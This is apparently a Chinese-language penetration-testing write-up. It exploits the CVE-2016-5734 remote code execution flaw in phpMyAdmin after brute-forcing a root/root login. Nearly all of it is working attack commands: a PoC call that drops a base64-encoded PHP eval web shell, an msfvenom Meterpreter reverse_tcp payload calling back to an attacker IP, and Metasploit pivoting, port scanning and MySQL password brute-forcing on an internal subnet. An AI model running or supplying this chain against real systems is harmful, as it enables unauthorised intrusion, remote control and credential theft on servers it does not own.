CVE-2016-5734远程代码执行漏洞
影响版的本phpmyadmin4.3.0-4.6.2
看到phpmyadmin登陆页面爆破拿到用户名密码root,root
利用poc进行命令执行
写入一句话进行菜刀连接
python27 CVE-2016-5734.py -u root -p "root" http://xx.xx.xx.xx:8080 -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4='));"
权限比较低用msfvenom生成一个木马
┌──(root??kali)-[/home/]
└─ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.189.129 LPORT=9090 -f elf >/root/sa.elf
通过菜刀上传到服务器
在msfvenom开启监听
在服务器执行木马文件,不知啥原因指令得打好几次才执行
成功监听
有一个内网的网段可以内网渗透一波
添加通向跳板机的路由
进行内网扫描
meterpreter > background
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set PORTS 80,8080,21,22,3389,445,1433,3306
PORTS => 80,8080,21,22,3389,445,1433,3306
msf auxiliary(tcp) > set RHOSTS 172.18.0.0/24
RHOSTS => 172.18.0.0/24
msf auxiliary(tcp) > set THERADS 10
THERADS => 10
msf auxiliary(tcp) > exploit
对172.18.0.2的3306端口进行爆破
msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > show options
msf6 auxiliary(scanner/mysql/mysql_login) > set rhosts 172.18.0.2
msf6 auxiliary(scanner/mysql/mysql_login) > set rport 3306
msf6 auxiliary(scanner/mysql/mysql_login) > set user_file /home/dzj/user1.txt
msf6 auxiliary(scanner/mysql/mysql_login) > set pass_file /home/dzj/pass1.txt
